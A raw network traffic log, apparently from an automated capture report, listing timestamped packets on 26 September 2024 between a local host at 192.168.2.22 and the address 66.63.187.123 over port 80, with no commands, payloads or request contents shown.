                                              Sep 26, 2024 07:47:21.293590069 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293618917 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293637037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293648958 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293668985 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293678045 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293680906 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293694019 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293704987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293705940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293716908 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293723106 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293742895 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293766975 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293795109 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293802977 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293814898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293838024 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293838978 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293847084 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293864012 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293874025 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293895960 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293909073 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293929100 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293940067 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293956041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.293960094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293970108 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.293988943 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294003963 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294049978 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294060946 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294080019 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294100046 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294117928 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294203043 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294228077 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294240952 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294250011 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294262886 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294272900 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294276953 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294315100 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294401884 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294451952 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294497967 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294511080 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294532061 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294543028 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294549942 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294565916 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294572115 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294579029 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294591904 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294606924 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294625044 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294641018 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294651031 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294670105 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294682026 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294688940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294703007 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294724941 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294754028 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294754982 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294766903 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294785976 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294795990 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294796944 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294816971 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294827938 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294845104 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294846058 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294857979 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294862986 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294881105 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294883013 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294892073 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294894934 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294914961 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294919014 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294939041 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294939041 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294953108 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.294954062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294981003 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.294997931 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.295032024 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.295044899 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.295078993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.295085907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.295167923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.295180082 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.295218945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.295262098 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.295286894 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.295331955 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.295340061 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.295382023 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.295486927 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443336010 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443355083 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443412066 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443429947 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443443060 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443454027 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443470955 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443490982 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443502903 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443517923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443540096 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443551064 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443567991 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443577051 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443584919 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443597078 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443568945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443568945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443568945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443568945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443568945 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443645954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443645954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443645954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443645954 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443682909 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443692923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443717957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443727970 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443744898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443753958 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.443810940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443810940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443810940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443810940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443810940 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.443929911 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590198994 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590348959 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590382099 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590379953 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590411901 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590432882 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590434074 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590434074 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590449095 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590456963 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590476036 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590481997 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590502024 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590514898 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590517998 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590533018 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590557098 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590569973 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590578079 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590589046 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590612888 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590617895 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590626001 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590639114 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590651989 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590661049 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590684891 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590694904 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590697050 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590723991 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590737104 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590749979 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590766907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590783119 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590787888 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590801954 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590823889 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590828896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590842962 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590848923 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590872049 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590873957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590892076 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590897083 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590909958 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590919971 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590939045 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590939045 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590960026 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590964079 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.590979099 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.590986967 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591010094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591022968 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591025114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591037989 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591067076 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591078043 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591089010 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591097116 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591120005 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591125011 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591140032 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591142893 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591166973 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591176987 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591185093 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591198921 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591217995 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591218948 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591234922 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591244936 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591257095 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591265917 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591289997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591289997 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591310024 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591312885 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591332912 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591340065 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591351032 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591358900 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591382027 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591396093 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591401100 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591435909 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591439009 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591453075 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591483116 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591485023 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591502905 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591507912 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591525078 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591531038 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591548920 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591551065 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591572046 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591577053 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591584921 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591598988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591619015 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591622114 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.591639996 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.591659069 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.592142105 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.733841896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.733906031 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.733925104 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.733953953 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.733983994 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.733998060 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734013081 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734025955 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734044075 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734045029 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734045029 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734052896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734055042 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734086037 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734086037 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734097004 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734117031 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734132051 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734138012 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734158993 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734165907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734178066 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734189034 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734203100 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734215021 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734215021 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734234095 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734246969 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734253883 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734277964 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734280109 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734297037 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734306097 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734316111 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734338045 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734354019 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734357119 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734388113 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734391928 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734411955 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734426975 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734435081 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734442949 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734456062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734462976 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734488964 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734492064 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734507084 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734519958 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734529972 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734539032 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734563112 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734564066 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734591961 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734599113 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734611988 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734620094 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734628916 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734638929 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734649897 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734658957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734684944 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734688997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734695911 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734703064 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734728098 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734730005 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734755993 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734762907 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734777927 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734801054 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734807968 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734827042 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734828949 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734848976 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734858990 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734863997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734878063 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734901905 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734904051 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734911919 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734925032 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734936953 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734937906 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734968901 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734972000 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.734977007 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.734992027 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.735017061 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.735021114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735021114 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735028982 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735035896 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.735053062 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735054970 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.735074997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735074997 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735080957 CEST804916166.63.187.123192.168.2.22
                                              Sep 26, 2024 07:47:21.735090017 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735129118 CEST4916180192.168.2.2266.63.187.123
                                              Sep 26, 2024 07:47:21.735129118 CEST4916180192.168.2.2266.63.187.123
